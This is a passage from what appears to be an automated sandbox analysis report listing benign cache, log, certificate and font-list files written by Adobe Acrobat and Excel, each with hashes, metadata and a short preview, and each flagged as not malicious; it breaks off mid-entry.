                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                            Malicious:false
                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\5fcbf837-fd53-409b-b419-085e50cf69dc.tmp

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:modified
                            Size (bytes):508
                            Entropy (8bit):5.055214842588389
                            Encrypted:false
                            SSDEEP:12:YH/um3RA8sqcsBdOg2HrCcaq3QYiubxnP7E4TfF+:Y2sRdsIdMHrN3QYhbxP7np+
                            MD5:D879FBA102A95CE004AC5AD399105C37
                            SHA1:B1E8472E7A42E879878E9D70CF24AC252FEF89C6
                            SHA-256:DBE2D814C019A20233DDB96DDFAA95AD459CD4CED252956F286138A21DD9E520
                            SHA-512:48B4CF0F00CC0D316B0CC4B991601206E9422D16417034D5126EBC1268E25DED2ABFEB59BA29E198D52BCA9A2C4475A9696FADF836D0871B1BFAD2D695F366E9
                            Malicious:false
                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378369732609841","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":588841},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):508
                            Entropy (8bit):5.047195090775108
                            Encrypted:false
                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                            MD5:70321A46A77A3C2465E2F031754B3E06
                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                            Malicious:false
                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5c85f9.TMP (copy)

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):508
                            Entropy (8bit):5.047195090775108
                            Encrypted:false
                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                            MD5:70321A46A77A3C2465E2F031754B3E06
                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                            Malicious:false
                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4509
                            Entropy (8bit):5.233345668046924
                            Encrypted:false
                            SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUBleaV2hoq67KZ:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNL5
                            MD5:FE0BBD8A415FAE79A31FA32F15F70C25
                            SHA1:D7C0FF93E78892F12F6F1BFFE4A24E68DF554F99
                            SHA-256:02E1E0CE927509C418F60194D47F7822CB4E5FCF65BBCC708AF9A678CB75AA11
                            SHA-512:8FBB8A77CBC8A97F46254A3C43F33EDC000ACB388AA2880AC77D697AD2A15110A2ABE8FB0956A95BB007836C562F3735FC2ADD9260A7F5E63C613C743A1C563A
                            Malicious:false
                            Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):326
                            Entropy (8bit):5.164826831152883
                            Encrypted:false
                            SSDEEP:6:7rXeVq2P92nKuAl9OmbzNMxIFUt8OrJZmw+OrpFkwO92nKuAl9OmbzNMFLJ:7ruVv4HAa8jFUt8OrJ/+Or35LHAa84J
                            MD5:B2B4478A32B0BE754F581D9B37997CF6
                            SHA1:1B9158F8CCE258AB1D84600DC003BFAAC19C75C4
                            SHA-256:CA6FF299BA5AE7B2DE8790B9CE87397ADC41437943B9C7247B0C726A9793627E
                            SHA-512:5C8790C9FBEA6630AC25C7A75131D5B8CD2FC88BE4DAC00CEC6668E06E32BB7D7E4AD8DA31BF2A6D6B7A20C004F6C51730AAC2D0292B176A7D7B6A5B5E716BBE
                            Malicious:false
                            Preview:2024/12/10-00:48:41.066 1b90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/10-00:48:41.071 1b90 Recovering log #3.2024/12/10-00:48:41.075 1b90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):326
                            Entropy (8bit):5.164826831152883
                            Encrypted:false
                            SSDEEP:6:7rXeVq2P92nKuAl9OmbzNMxIFUt8OrJZmw+OrpFkwO92nKuAl9OmbzNMFLJ:7ruVv4HAa8jFUt8OrJ/+Or35LHAa84J
                            MD5:B2B4478A32B0BE754F581D9B37997CF6
                            SHA1:1B9158F8CCE258AB1D84600DC003BFAAC19C75C4
                            SHA-256:CA6FF299BA5AE7B2DE8790B9CE87397ADC41437943B9C7247B0C726A9793627E
                            SHA-512:5C8790C9FBEA6630AC25C7A75131D5B8CD2FC88BE4DAC00CEC6668E06E32BB7D7E4AD8DA31BF2A6D6B7A20C004F6C51730AAC2D0292B176A7D7B6A5B5E716BBE
                            Malicious:false
                            Preview:2024/12/10-00:48:41.066 1b90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/10-00:48:41.071 1b90 Recovering log #3.2024/12/10-00:48:41.075 1b90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:Certificate, Version=3
                            Category:dropped
                            Size (bytes):1391
                            Entropy (8bit):7.705940075877404
                            Encrypted:false
                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                            Malicious:false
                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                            Category:dropped
                            Size (bytes):4761
                            Entropy (8bit):7.945585251880973
                            Encrypted:false
                            SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                            MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                            SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                            SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                            SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                            Malicious:false
                            Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....

                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):192
                            Entropy (8bit):2.7569015731729736
                            Encrypted:false
                            SSDEEP:3:kkFkllX0MDtfllXlE/HT8k21NNX8RolJuRdxLlGB9lQRYwpDdt:kKRkeT8F7NMa8RdWBwRd
                            MD5:2E140CC808F7E24862B7135F6AB8879A
                            SHA1:CF332C43A0D68C3108E576DAA79536B407FC5507
                            SHA-256:43C67039436FC8DB8E08F697CC829E3AF46402486180F4B138E5497F170949B8
                            SHA-512:24CA87859857366EB24CA2A6E9194A696585FEA69FCAE9D09FC8AFD182FED36688F8C83338A3248648D65EFCEA523BF9896279BD6B9110E79FB78C58AE4C0462
                            Malicious:false
                            Preview:p...... ........V.I0.J..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):340
                            Entropy (8bit):3.262470744919491
                            Encrypted:false
                            SSDEEP:6:kKyC5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:MLkPlE99SCQl2DUeXJlOA
                            MD5:DE69FF90A7AD2EF1AC51F17AA0245DC2
                            SHA1:D010C91C0D83295A72516E66DB3B1430790DA56A
                            SHA-256:15CFB196B6C23069D896AEAAE101A16502F6979F210AEDB45C516E14A3F768AA
                            SHA-512:09B420BD2F48720F7BC863F737DC7CDEE75759A0090BF55F9426FBE9040AC1AD3AEC9C483DF05459D3A7A15F68D7E9F2F5537A0A1D833B0E48F2AA2BA1E19DF1
                            Malicious:false
                            Preview:p...... ........g.X..J..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):1233
                            Entropy (8bit):5.231764319122804
                            Encrypted:false
                            SSDEEP:24:kkOid8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:nkxPhtgNgx4pyZxakazxCIK2gxap
                            MD5:9A2F91583335D08C674325CD5BCD308D
                            SHA1:1CA6006B93ED4DB5BFFE4FC2DA01C4AD10D99D1F
                            SHA-256:4FAFB1DFB2D6F2BB2BFC97D6F3D770F9C0B50B30C3335BA3193E1B34D7F7887E
                            SHA-512:100CB6C784A589CC25A5207FA0AA3194D8D5D920C5D4387AF98A4561FAAF4C6084A51B97304D798CF1C363828670F234832421E528D501FF8E1E605BA3BA0E61
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.3572

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):1233
                            Entropy (8bit):5.231764319122804
                            Encrypted:false
                            SSDEEP:24:kkOid8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:nkxPhtgNgx4pyZxakazxCIK2gxap
                            MD5:9A2F91583335D08C674325CD5BCD308D
                            SHA1:1CA6006B93ED4DB5BFFE4FC2DA01C4AD10D99D1F
                            SHA-256:4FAFB1DFB2D6F2BB2BFC97D6F3D770F9C0B50B30C3335BA3193E1B34D7F7887E
                            SHA-512:100CB6C784A589CC25A5207FA0AA3194D8D5D920C5D4387AF98A4561FAAF4C6084A51B97304D798CF1C363828670F234832421E528D501FF8E1E605BA3BA0E61
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):1233
                            Entropy (8bit):5.231764319122804
                            Encrypted:false
                            SSDEEP:24:kkOid8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:nkxPhtgNgx4pyZxakazxCIK2gxap
                            MD5:9A2F91583335D08C674325CD5BCD308D
                            SHA1:1CA6006B93ED4DB5BFFE4FC2DA01C4AD10D99D1F
                            SHA-256:4FAFB1DFB2D6F2BB2BFC97D6F3D770F9C0B50B30C3335BA3193E1B34D7F7887E
                            SHA-512:100CB6C784A589CC25A5207FA0AA3194D8D5D920C5D4387AF98A4561FAAF4C6084A51B97304D798CF1C363828670F234832421E528D501FF8E1E605BA3BA0E61
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):10880
                            Entropy (8bit):5.214006841239478
                            Encrypted:false
                            SSDEEP:192:8gAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:8V548vvqvSvivzv4vkv1vkvKlsvVtfZp
                            MD5:57BD0790C91010ADF06F1B70F4F61828
                            SHA1:EC7FA144A1F48D5F9B0A4FCDC1088E5CB5C4E812
                            SHA-256:3006B1E391240D7955873134D96E215D1F9371A086E0825821CCEE3809103A1B
                            SHA-512:BE9FABC19986B9C2A0EA1AB3CD285FF18689F7F4B25E3D1F9F1B666358832361FA72CA8B92E9FEA7864F5227F5E6430DF9CE88435339477BBF96978CCB60BD98
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.3572

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):10880
                            Entropy (8bit):5.214006841239478
                            Encrypted:false
                            SSDEEP:192:8gAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:8V548vvqvSvivzv4vkv1vkvKlsvVtfZp
                            MD5:57BD0790C91010ADF06F1B70F4F61828
                            SHA1:EC7FA144A1F48D5F9B0A4FCDC1088E5CB5C4E812
                            SHA-256:3006B1E391240D7955873134D96E215D1F9371A086E0825821CCEE3809103A1B
                            SHA-512:BE9FABC19986B9C2A0EA1AB3CD285FF18689F7F4B25E3D1F9F1B666358832361FA72CA8B92E9FEA7864F5227F5E6430DF9CE88435339477BBF96978CCB60BD98
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):227002
                            Entropy (8bit):3.392780893644728
                            Encrypted:false
                            SSDEEP:1536:WKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:DPCaJ/3AYvYwglFoL+sn
                            MD5:87EDBEE38F56C20298F25D5D3D4D1B5C
                            SHA1:7F904E9615AC3186A87472EF366DD8202855B0B7
                            SHA-256:A46B56D3ABCC137D1872DDF20EED4BCD7D04518282282ADB32DDCCF70D7FFBA6
                            SHA-512:BBEBC1FCD5BC9AE042DD5782425BA8C47BF3EAC283B2487FC4E3FF6BF8101306DAB081E5135594165D4DC1AC120FF125AADBC5B3FFE7C646183C04DF77865E0D
                            Malicious:false
                            Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):295
